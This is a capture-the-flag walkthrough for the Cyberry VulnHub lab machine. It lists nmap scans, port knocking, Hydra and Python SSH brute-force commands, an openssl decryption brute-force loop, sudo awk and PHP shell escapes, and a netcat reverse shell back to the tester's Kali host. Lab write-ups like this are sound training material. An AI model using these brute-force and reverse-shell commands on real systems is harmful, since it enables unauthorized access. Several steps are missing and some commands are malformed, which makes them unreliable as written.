Solve the Cyberry Vulnhub in 36 Steps
This article is going to walk through the step I used to solve the Cyberry vulnerable VMs that can be download at the https://www.vulnhub.com/entry/cyberry-1,217/
Tools used on this game
- Kali 64bits (192.168.187.135)
- netdiscover
- NMAP
- Python
- Knock
- Nikto
- Hydra
- Netcat
- crunch
1) Downloaded the Cyberry at VulnHub to start the game using any VM client. The VMware Workstation 15 was used for this walk through.
or using another Linux commend nmap -sn 192.168.187.1/24
3) Got the basic information about the server using nmap -sV 192.168.187.129
4) An Apache webserver was found and visited this web site
5) Viewed the source code and find base64 encode text, tried to decode it but nothing to see
decode the text using Linux commend
decode the 10101 using the following script and found that a image file boss.gif, but nothing inside.
6) Quick checked any vulnerability in the site by using nikto
A login page was found , but, SQL injection or other injection technique cannot apply to this login page
7) View the source code of this login page and see and another page in the website
Visit the http://192.168.187.129/berrypedia.html
8) View the source view-source: http://192.168.187.129/berrypedia.html and a image file name is some different placeho1der.jpg
Download the image
9) Don’t know how to do it on this image
Google the solution
After googled, these four guys are famous singers in US, they all sang the same song “I hear you knocking” and the release date of the song are 1970 1955 1955 1961.
It may be the Port Knock applied on the server
11) Scanned all port of the target machine by using nmap -p – again after knock, alternatively, other than using "knock" command, a simple python program prepared for knocking the port
or using the knock Linux command as below, if you cannot unknock the port, restart the Cyberry
A new high port was found 61955
12) Assessed the “new” found website and search anything inside
13) Get some idea here http://192.168.187.129:61955/H, we open it and find brain-fuck encoded strings
14) This is brainfuck encoded text, using online decoder to decode it such as https://www.dcode.fr/brainfuck-language and the result was
team members
chuck
halle
nick
terry
mary
kerry
pw: bakeoff
16) Try to login with FTP or SSH as the port was open, using Hydra to try
17) FTP using "mary" account
for i in $(openssl enc -ciphers | tail -n +2);
do for j in $(cat opensslPass.txt);
do openssl ${i:1} -d -salt -md md5 -in reminder.enc -out "dec$i$j" -k $j;
done;
done 2>/dev/null
20) Got the file, as one of the decrypted file return in ASCII format
23) Tried to do the commend injection using brute, start the netcat server at my Kali.
24) Using python to gain the reverse shell import pty;pty.spawn("/bin/bash")'
25) check the available file in the directory and found there was a readable file
26)User Python SHH Brute Forcer and using this password file with the user list pervious found.
https://github.com/R4stl1n/SSH-Brute-Forcer
python SSHBruteForce.py -i 192.168.187.129 -d True -p 2222 -U ./usernames.txt -P ./passwords.txt -t 15 -T 30
Or we can use hyrda
hydra -L user.txt -P password.txt -f ssh://192.168.187.129
27) SSH to the target using "nick" and go around on his home directory, found that the invoke.sh cannot be access, but it can be sudo to terry to access.
28) Try to sudo Terry account to access the invoke.sh
29) read the invoke.sh now, but nothing special inside. Try again any other account can be sudo
30) halle can be sudo on awk, let try to escape the shell -> sudo 0 u halle awk 'BEGIN { system("/bin/sh") }'"/bin/sh")}'
31) Check the sudo list again and found user “chuck”
32) PHP can also be escaped.......
Setup the netcat channel at my kali
sudo -u
chuck /usr/bin/php -r 'shell_exec("/bin/nc 192.168.187.136 443 -e /bin/bash");'
33) Check home directory of chuck
34) Started at “che”, end with “rry”, “baca” in between and the total length of the password was 15. Using the crunch to generate all possible value
The Answer.....
